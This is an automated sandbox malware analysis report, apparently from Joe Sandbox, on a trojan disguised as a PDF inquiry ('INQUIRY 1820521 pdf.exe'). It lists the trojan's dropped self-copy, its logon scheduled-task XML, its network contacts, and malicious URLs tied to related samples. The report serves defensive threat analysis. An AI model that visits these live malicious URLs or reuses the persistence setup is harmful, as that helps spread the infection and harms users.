104.21.82.58	www.xinghai-nb.com	United States	13335	CLOUDFLARENETUS	true
198.185.159.144	ext-sq.squarespace.com	United States	53831	SQUARESPACEUS	false
210.152.87.233	hhcuerkn.com	Japan	4694	IDCFIDCFrontierIncJP	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	385289
Start date:	12.04.2021
Start time:	09:41:19
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 23s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	INQUIRY 1820521 pdf.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@17/4@3/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 9.2% (good quality ratio 6.8%) Quality average: 57.3% Quality standard deviation: 39.3%
HCA Information:	Successful, ratio: 98% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 92.122.145.220, 104.42.151.234, 20.82.210.154, 13.64.90.137, 205.185.216.42, 205.185.216.10, 104.43.193.48, 104.43.139.144, 92.122.213.247, 92.122.213.194, 52.255.188.83, 20.54.26.129 Excluded domains from analysis (whitelisted): skypedataprdcolwus17.cloudapp.net, arc.msn.com.nsatc.net, ris-prod.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, skypedataprdcolcus16.cloudapp.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, skypedataprdcolwus16.cloudapp.net, au-bg-shim.trafficmanager.net Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:42:14	API Interceptor	1x Sleep call for process: INQUIRY 1820521 pdf.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
198.185.159.144	sgJRcWvnkP.exe	Get hash	malicious	Browse	www.aldlan-studio.com/svh9/?EZA4iv=iUgadD8kb6gMm/UthcIeLrQXBXKqEwA1IwoQkb8SyhCa1CCH2tdbgVRBTGVl6GtCHz6WbdtHlg==&GzuLH=VBZtT83HH6GhB4
	remittance info.xlsx	Get hash	malicious	Browse	www.makingwaves.design/svh9/?5ja0c8yp=HlxAPFB4jZ3NXox3gOhW2mb89mcrhBqsxr7jk8SFshbVhphDLQeHIc6bZtAlCAGtmfvtHQ==&2dn4M=z4DhUBy8
	36ne6xnkop.exe	Get hash	malicious	Browse	www.totally-seo.com/p2io/?1bVpY=TySV6YYzJGXnavbEwOCoDLKT5SC+Z4HfI/S6WoKTLKp4rrhaLWxPw3pQ7MoCWZBvIMUw&TVg8Ar=tFNd1Vlhj2qp
	mW07jhVxX5.exe	Get hash	malicious	Browse	www.creationsbyjamie.com/nsag/?Jry=uVd8K&MHQD=ikjZmpp02NVieHaNLwg8/vzbnsAf6IhlNdOODdzSNMaisic822ysYeH69uqv2TJux/MF
	NEW ORDER ELO-05756485.exe	Get hash	malicious	Browse	www.gammacake.com/riai/?Tj=WtQWSOTzj6QeB4pNJBVQ9tU2A2vUwP0QAZgX7UMYEeL+qDlhyiyE4waWUtaNiZ+URiEIlTuTIg==&RX=dhutZbdHWPcd4ls
	PO45937008ADENGY.exe	Get hash	malicious	Browse	www.theskineditco.com/mb7q/?yN60IZO0=ls93n2nhUbPH7ZWasPqHHp+Oj5DBIWMdhgoo5YdbrjX5fhF2xRgLdx2nyRRs2JHw0wni&1bhta6=SXxhAn0Xl
	LWlcpDjYIQ.exe	Get hash	malicious	Browse	www.anadelalastra.art/sqra/?NBZl=lD4TJk9xsMd0/PL293fidflTFReEfYiBAFO2d5wZtfSldQt+n1O6CAKQlGZxKl5sANQQ&lzul=wRDL7BohbLBLJV
	RCS76393.exe	Get hash	malicious	Browse	www.pimpmyrecipe.com/goei/?EzuXh6BP=TTuxDc9EejbduYk8ZHEjlKcpN/O2EpBILXUKac8y6lhY4fajDGEqKXEgdN9L03N9MJzUHOy50w==&RL0=rVvxj02xpd_lyz
	PO4308.exe	Get hash	malicious	Browse	www.alchemistslibrary.com/pnqr/?X2JtjTX8=z9nKZcvAPWzUQhY9y3T5XVIzOkQhxhUtd7CKHZyMoghVgOSKx+Fjs7sJEQh08Ts7gk8yJD62ag==&bl=TVItEdNXpFHh
	TazxfJHRhq.exe	Get hash	malicious	Browse	www.theholisticbirthco.com/evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu
	Order Inquiry.exe	Get hash	malicious	Browse	www.getgenevieved.com/r4ei/?9rQl2=wFNtQXbP&t6Ad=lOfuxtPF4il1Jf5EERhirk3Wdt+b9SUzBWaFyElm1rRKZL2x7wuCbVuufCM8qdhuJ86n
	TACA20210407.PDF.exe	Get hash	malicious	Browse	www.cindybelardo.com/qqeq/?oX=dLvWoyYzKTWvJDoMFkksqqSDwqODaAlE6DnRYqazt3fnGgf3WgjjWBSyr976CPGLkKL8&sBZ8qr=Fxl8FxGPjJo8-
	New Order.exe	Get hash	malicious	Browse	www.radiorejekts.com/gwam/?Iry=ONtj9W7nV9ZGpEHVJNfDlWrNbkpYgiFClGnoUoEoQiKZyCXOLwMg6K6LKjWWFncBTlNA&ob30vr=S0Glx8
	SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exe	Get hash	malicious	Browse	www.cindybelardo.com/qqeq/?UR-TRLn=dLvWoyYzKTWvJDoMFkksqqSDwqODaAlE6DnRYqazt3fnGgf3WgjjWBSyr+bASemz+tq7&P6u=Hb9l0TTXQ4NLhX
	New PO#700-20-HDO410444RF217,pdf.exe	Get hash	malicious	Browse	www.xomonroe.com/evh4/?vR-lx=mUKuFt7Jt/u71c4PSt38ziCZS3BUg2e8LD2S6eZiZC4IumnTujc05pOAm4tUdXdaGNCmokkeSA==&E8LHll=jfIX5LDxkxdhJTgP
	New Month.exe	Get hash	malicious	Browse	www.ussouthernhome.com/nppk/?kfIXa4=PcNj3q/CMcdvPYJC9A1ueSg5wRTqWaK9K+KWTMGfE5xIowphBNT+eHYPWkjoOWig7+Qi&XP0=ybFLQT2H0FsXBx
	QUOTATION REQUEST.exe	Get hash	malicious	Browse	www.markrobersticker.com/aun3/?YrIHdvPX=r/YBW9ssF3S+2poRG61gcf3j1YCgKIjwgQz6XW4ODbs5DL3PWKC9kUAY5ABsTG3sD74i&Dzut_N=3fm0
	new built.exe	Get hash	malicious	Browse	www.amymako.com/klf/?TlX=YvLT&t8o=YIBPr2PP4TUydPzAxpqYzoT8Fd3d4uq1lz450j/EP32B3j2OHU2eBgUME3q0XrkiC9k9
	Invoice.xlsx	Get hash	malicious	Browse	www.aratssycosmetics.com/iu4d/?L2JH=uKRUrjhLA6aGoerdjROgrXpkE9A34BbuVfDDyYeArPtVUwLJNjfP2xipo2Au/YQGKskRiw==&0n=fxlp
	MACHINE SPECIFICATION.exe	Get hash	malicious	Browse	www.egofickle.com/rrrq/?0R-LTpD=fIBAwtBUc2AtuFdzEcCTdBR4iqwx1dALhor1r45uJJNE7oTAKP6XpVhMc7NBwxyLLq7z&uDKlwt=XPiPwvlxrzD

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ext-sq.squarespace.com	RFQ #Uacac#Uc801#Uc694#Uccad_#Ud574#Uc131190918.exe	Get hash	malicious	Browse	198.185.159.144
	36ne6xnkop.exe	Get hash	malicious	Browse	198.185.159.144
	mW07jhVxX5.exe	Get hash	malicious	Browse	198.185.159.144
	cV1uaQeOGg.exe	Get hash	malicious	Browse	198.49.23.145
	PO.exe	Get hash	malicious	Browse	198.185.159.144
	PO45937008ADENGY.exe	Get hash	malicious	Browse	198.185.159.144
	LWlcpDjYIQ.exe	Get hash	malicious	Browse	198.185.159.144
	TazxfJHRhq.exe	Get hash	malicious	Browse	198.185.159.144
	Order Inquiry.exe	Get hash	malicious	Browse	198.185.159.144
	TACA20210407.PDF.exe	Get hash	malicious	Browse	198.185.159.144
	New Order.exe	Get hash	malicious	Browse	198.49.23.144
	New Order.exe	Get hash	malicious	Browse	198.185.159.144
	SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exe	Get hash	malicious	Browse	198.185.159.144
	DHL Shipping Documents.exe	Get hash	malicious	Browse	198.49.23.145
	New PO#700-20-HDO410444RF217,pdf.exe	Get hash	malicious	Browse	198.185.159.144
	New Month.exe	Get hash	malicious	Browse	198.185.159.144
	QUOTATION REQUEST.exe	Get hash	malicious	Browse	198.185.159.144
	new built.exe	Get hash	malicious	Browse	198.185.159.144
	Invoice.xlsx	Get hash	malicious	Browse	198.185.159.144
	MACHINE SPECIFICATION.exe	Get hash	malicious	Browse	198.185.159.144

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SQUARESPACEUS	sgJRcWvnkP.exe	Get hash	malicious	Browse	198.185.159.144
	remittance info.xlsx	Get hash	malicious	Browse	198.185.159.144
	36ne6xnkop.exe	Get hash	malicious	Browse	198.185.159.144
	mW07jhVxX5.exe	Get hash	malicious	Browse	198.185.159.144
	NEW ORDER ELO-05756485.exe	Get hash	malicious	Browse	198.185.159.144
	PO45937008ADENGY.exe	Get hash	malicious	Browse	198.185.159.144
	LWlcpDjYIQ.exe	Get hash	malicious	Browse	198.185.159.144
	RCS76393.exe	Get hash	malicious	Browse	198.185.159.144
	PO4308.exe	Get hash	malicious	Browse	198.185.159.144
	TazxfJHRhq.exe	Get hash	malicious	Browse	198.185.159.144
	Order Inquiry.exe	Get hash	malicious	Browse	198.185.159.144
	PO#41000055885.exe	Get hash	malicious	Browse	198.49.23.144
	TACA20210407.PDF.exe	Get hash	malicious	Browse	198.185.159.144
	New Order.exe	Get hash	malicious	Browse	198.49.23.144
	New Order.exe	Get hash	malicious	Browse	198.185.159.144
	SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exe	Get hash	malicious	Browse	198.185.159.144
	DHL Shipping Documents.exe	Get hash	malicious	Browse	198.49.23.145
	New PO#700-20-HDO410444RF217,pdf.exe	Get hash	malicious	Browse	198.185.159.144
	New Month.exe	Get hash	malicious	Browse	198.185.159.144
	QUOTATION REQUEST.exe	Get hash	malicious	Browse	198.185.159.144
CLOUDFLARENETUS	PO NUMBER 3120386 3120393 SIGNED.exe	Get hash	malicious	Browse	1.2.3.4
	Cobro Juridico_07223243630_5643594_539661009070075_49874359_5059639084170590400_7272781644_pdf.exe	Get hash	malicious	Browse	172.67.222.176
	BL2659618800638119374.xls.exe	Get hash	malicious	Browse	172.67.222.176
	Purchase order and quote confirmation.exe	Get hash	malicious	Browse	172.67.222.176
	Confirm Order for SK TRIMS & INDUSTRIES_DK4571,pdf.exe	Get hash	malicious	Browse	172.67.188.154
	Re Confirm#U00ffthe invoice#U00ffthe payment slip.exe	Get hash	malicious	Browse	104.21.17.57
	SOA.exe	Get hash	malicious	Browse	104.21.19.200
	RFQ No A'4762GHTECHNICAL DETAILS.exe	Get hash	malicious	Browse	104.21.19.200
	GQ5JvPEI6c.exe	Get hash	malicious	Browse	104.21.17.57
	setupapp.exe	Get hash	malicious	Browse	172.67.164.1
	g2qwgG2xbe.exe	Get hash	malicious	Browse	172.67.161.4
	C++ Dropper.exe	Get hash	malicious	Browse	104.21.50.92
	12042021493876783,xlsx.exe	Get hash	malicious	Browse	23.227.38.65
	JSTCG21040600210 xlxs.exe	Get hash	malicious	Browse	104.21.19.200
	PAYMENT RECEIPT.exe	Get hash	malicious	Browse	172.67.188.154
	PO5411.exe	Get hash	malicious	Browse	104.21.21.198
	COMMERCIAL INVOICE N#U00c2#U00ba 0001792E21.exe	Get hash	malicious	Browse	104.21.17.57
	9479_pdf.exe	Get hash	malicious	Browse	172.67.222.176
	fyi.exe	Get hash	malicious	Browse	172.67.188.154
	inv.exe	Get hash	malicious	Browse	104.21.73.99
IDCFIDCFrontierIncJP	YPJ9DZYIpO	Get hash	malicious	Browse	61.203.182.242
	ccavero@hycite.com.htm	Get hash	malicious	Browse	210.140.252.186
	z2xQEFs54b.exe	Get hash	malicious	Browse	210.140.73.39
	NEW ORDER.xlsx	Get hash	malicious	Browse	210.152.86.78
	Swift File_pdf.exe	Get hash	malicious	Browse	210.152.86.78
	Payment Transfer Copy of $274,876.00 for the invoice shipments.exe	Get hash	malicious	Browse	210.152.86.132
	wEcncyxrEe	Get hash	malicious	Browse	202.230.13.241
	Xy4f5rcxOm.dll	Get hash	malicious	Browse	164.46.102.68
	990109.exe	Get hash	malicious	Browse	210.140.73.39
	https://performoverlyrefinedapplication.icu/CizCEYfXXsFZDea6dskVLfEdY6BHDc59rTngFTpi7WA?clck=d1b1d4dc-5066-446f-b596-331832cbbdd0&sid=l84343	Get hash	malicious	Browse	202.241.208.4
	http://perpetual.veteran.az/673616c6c792e64756e6e654070657270657475616c2e636f6d2e6175	Get hash	malicious	Browse	202.241.208.56
	SecuriteInfo.com.Trojan.DownLoader7.37706.14895.exe	Get hash	malicious	Browse	210.152.124.48
	SecuriteInfo.com.Trojan.DownLoader7.37706.14895.exe	Get hash	malicious	Browse	210.152.124.48
	qkN4OZWFG6.exe	Get hash	malicious	Browse	202.230.201.31
	kvdYhqN3Nh.exe	Get hash	malicious	Browse	210.140.73.39
	https://wolusozai.web.app/yuniri-%E9%AB%98%E9%BD%A2%E8%80%85-%E7%84%A1%E6%96%99%E3%82%A4%E3%83%A9%E3%82%B9%E3%83%88.html	Get hash	malicious	Browse	210.129.190.174
	3yhnaDfaxn.exe	Get hash	malicious	Browse	210.140.73.39
	https://nursing-theory.org/theories-and-models/holistic-nursing.php	Get hash	malicious	Browse	202.241.208.55
	http://lapolicegear.com/?msclkid=bff2b1b585fd11812fcaee88d4e2dc4d&utm_source=bing&utm_medium=cpc&utm_campaign=ECI%20-%20LA%20Police%20Gear%20-%20Branded&utm_term=lapg%20gear&utm_content=LAPG%20Branded	Get hash	malicious	Browse	202.241.208.100
	http://www.fujikura-control.com	Get hash	malicious	Browse	210.140.44.93

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\INQUIRY 1820521 pdf.exe.log Download File
Process:	C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
MD5:	1DC1A2DCC9EFAA84EABF4F6D6066565B
SHA1:	B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
SHA-256:	28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
SHA-512:	95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Temp\tmp7085.tmp Download File
Process:	C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1647
Entropy (8bit):	5.192992199210482
Encrypted:	false
SSDEEP:	24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBGyTtn:cbhK79lNQR/rydbz9I3YODOLNdq3n
MD5:	FF62EF076287CFB81F8ED2C5EF6F9231
SHA1:	2C615B6431D0EA97DC0E72ABD637E4BD45B85E3E
SHA-256:	1744396F535974D7DF009A067FDCB0D34C03B44A10BD8FF3C3877F2D1AC74EF5
SHA-512:	111B8BAE573593D17A6C6F0CDD9D408CC28994F316DF17081D0A6C2466B906593938C8D6C952093458C70C5B4DA51717F6BFBE1FBBBA1C10B247DD321A2E8ED4
Malicious:	true
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

C:\Users\user\AppData\Roaming\YAhcdYrYHFkNNf.exe Download File
Process:	C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	859648
Entropy (8bit):	7.488650786243638
Encrypted:	false
SSDEEP:	12288:QgmBkzuw0TQD6dNxvJ9HuRfJDv0CATOcZOd5ln4T7luAHdu0RReBqJTN/D7adhAS:BEAuw0O6FuRfmCAf4j2tTHc0WqZBw
MD5:	DD3AE15E952C239AE6D87C8374B3B460
SHA1:	F8D9DACEB3FF1DADABF9051A04BB4356C370FBDE
SHA-256:	513357BE2837BB1211C3FE2A32D7E6CDECF75F6CF0DA1C2F0D198A38E3CDB759
SHA-512:	E5813F6369FAA127D2BDE9AF907E7BB31CDE0665F16038E9B3796EF8A0BF227822F9FD84C15A5646B680F1080253BBCC0117A6F1EA1DBD9CEE275F081D341E28
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 19%, Browse Antivirus: ReversingLabs, Detection: 41%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`..............P..............1... ...@....@.. ....................................@..................................1..S....@..p....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...p....@......................@..@.reloc.......`......................@..B.................1......H........>..........9........d............................................"L.=.0..-..9#.R.%-.Zj.bb. <...]....v]...=....YAu.....=..g..U.....A.Y.m...FR.S.~)............g\|#aV.hV..#.v.9......bV.[.e.....9....)X+.g...g....#.q.uH....../....I`..L:%..g.....g.l:-v...x.6U.e.../......N.A.A.u..G..........,...S...c...6.T!8...i4..Jz....P{.'+....c'...zBj....h...!..b.Y....^....zI.>......#...f..my......A.AqlG...f.`.-...g.G.}T..X ..J........*&...;.t.j.U^.BlR)T.4,...9MN?

C:\Users\user\AppData\Roaming\YAhcdYrYHFkNNf.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.488650786243638
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	INQUIRY 1820521 pdf.exe
File size:	859648
MD5:	dd3ae15e952c239ae6d87c8374b3b460
SHA1:	f8d9daceb3ff1dadabf9051a04bb4356c370fbde
SHA256:	513357be2837bb1211c3fe2a32d7e6cdecf75f6cf0da1c2f0d198a38e3cdb759
SHA512:	e5813f6369faa127d2bde9af907e7bb31cde0665f16038e9b3796ef8a0bf227822f9fd84c15a5646b680f1080253bbcc0117a6f1ea1dbd9cee275f081d341e28
SSDEEP:	12288:QgmBkzuw0TQD6dNxvJ9HuRfJDv0CATOcZOd5ln4T7luAHdu0RReBqJTN/D7adhAS:BEAuw0O6FuRfmCAf4j2tTHc0WqZBw
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....s`..............P..............1... ...@....@.. ....................................@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x4d31ee
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x607312B4 [Sun Apr 11 15:16:04 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd3198	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0x670	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xd11f4	0xd1200	False	0.766435202481	data	7.49655840913	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xd4000	0x670	0x800	False	0.3427734375	data	3.61228309464	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd6000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xd40a0	0x3e0	data
RT_MANIFEST	0xd4480	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright CodeUnit 2007
Assembly Version	2007.8.28.1
InternalName	FormattableString.exe
FileVersion	2007.08.28.1
CompanyName	CodeUnit
LegalTrademarks
Comments	Image Size Standardiser
ProductName	Image Size Standardiser
ProductVersion	2007.08.28.1
FileDescription	Image Size Standardiser
OriginalFilename	FormattableString.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 12, 2021 09:43:23.605489969 CEST	49732	80	192.168.2.4	210.152.87.233
Apr 12, 2021 09:43:23.893817902 CEST	80	49732	210.152.87.233	192.168.2.4
Apr 12, 2021 09:43:23.894022942 CEST	49732	80	192.168.2.4	210.152.87.233
Apr 12, 2021 09:43:23.894160032 CEST	49732	80	192.168.2.4	210.152.87.233
Apr 12, 2021 09:43:24.183762074 CEST	80	49732	210.152.87.233	192.168.2.4
Apr 12, 2021 09:43:24.183934927 CEST	80	49732	210.152.87.233	192.168.2.4
Apr 12, 2021 09:43:24.183948040 CEST	80	49732	210.152.87.233	192.168.2.4
Apr 12, 2021 09:43:24.184182882 CEST	49732	80	192.168.2.4	210.152.87.233
Apr 12, 2021 09:43:24.184211969 CEST	49732	80	192.168.2.4	210.152.87.233
